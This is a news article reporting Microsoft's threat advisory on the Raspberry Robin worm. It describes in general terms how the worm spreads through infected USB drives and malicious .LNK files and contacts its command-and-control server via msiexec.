Microsoft has spotted a dangerous Windows worm on networks of hundreds of organisations in various industries, as per a report that cites a private threat intelligence advisory sent to companies by the Redmond giant. The malware is called "Raspberry Robin" and spreads through USB devices, the report further said.
As per the report by Bleeping Computer, Microsoft's threat intelligence advisory that was shared with its Microsoft Defender for Endpoint subscribers says the Raspberry Robin worm has been spotted connecting to various addresses on the Tor network, but the threat actors have yet to exploit this access.
The group responsible for releasing the malware is currently unknown and the company is actively monitoring the networks. "Raspberry Robin" was first discovered in September last year by Red Canary researchers who spotted a "cluster of malicious activity". The researchers determined that the worm spreads to new devices through a malicious link file after studying an infected USB drive that contained a .LNK file.
As per the researchers, when the victim connects the infected USB drive, the worm starts a new process via the command prompt and runs the file on the compromised computer. The malware utilises Microsoft Standard Installer to connect to its command and control (C2) server (msiexec.exe) after which more malicious files are downloaded on the devices.
The experts at cybersecurity company Sekoia also noticed it while using QNAP NAS devices late last year.
Microsoft has categorised the present threat as "high-risk," saying that the attackers could infect entire networks if they wish to.